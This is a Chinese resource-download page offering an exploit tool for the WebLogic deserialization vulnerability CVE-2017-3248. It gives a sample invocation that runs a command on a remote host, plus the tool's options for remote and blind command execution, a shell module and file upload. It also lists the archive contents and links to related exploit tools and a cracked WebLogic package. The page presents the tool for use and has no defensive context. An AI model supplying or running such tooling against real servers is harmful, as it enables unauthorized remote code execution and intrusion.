资源简介
WebLogic反序列化_CVE-2017-3248
java -jar weblogic_cmd.jar -C pwd -H 192.168.1.1 -P 7001
工具使用方法:
-B Runtime Blind Execute Command maybe you should select os type
-C (执行命令)Execute Command[need set]
-dst path to dst file
-H (执行主机)Remote Host[need set]
-https enable https or tls
-noExecPath custom execute path
-os (操作系统类型)Os Type [windows,linux]
-P (远程端口)Remote Port[need set]
-shell enable shell module
-src path to src file
-T Payload Type[marshall, collection, streamMessageImpl]
-U Uninstall rmi
-upload enable upload a file
代码片段和文件信息
属性 大小 日期 时间 名称
----------- --------- ---------- ----- ----
文件 658 2018-09-06 21:36 WebLogic_CVE-2017-3248\工具使用方法.txt
文件 59282601 2017-07-15 02:41 WebLogic_CVE-2017-3248\weblogic_cmd.jar
文件 5630 2017-07-20 09:57 WebLogic_CVE-2017-3248\图片示例.png
目录 0 2018-02-28 22:15 WebLogic_CVE-2017-3248\
----------- --------- ---------- ----- ----
文件 658 2018-09-06 21:36 WebLogic_CVE-2017-3248\工具使用方法.txt
文件 59282601 2017-07-15 02:41 WebLogic_CVE-2017-3248\weblogic_cmd.jar
文件 5630 2017-07-20 09:57 WebLogic_CVE-2017-3248\图片示例.png
目录 0 2018-02-28 22:15 WebLogic_CVE-2017-3248\
- 上一篇:Java版本-微信服务号源码
- 下一篇:Java大学实用教程 第四版 耿祥义张跃平
相关资源
- weblogic180417反序列化补丁--p27395085_10
- JDK1.7的最新安装包jdk-7u271-linux
- wls1036_generic.jar
- Weblogic WLS组件REC漏洞(CVE-2017-10271)利
- weblogic反序列化漏洞测试jar包
- Java反序列化生成Payload附利用脚本
- 测试Websphere、Weblogic应用war包
- weblogic.9.2破解包
- jmx监控weblogictomcatwebsphere源码
- Java反序列化漏洞利用工具WebLogicJbos
- WebLogic部署安装(Linux).docx
- Java 序列化与反序列化对象
- Java 序列化与反序列化
- weblogic基本概念
评论
共有 条评论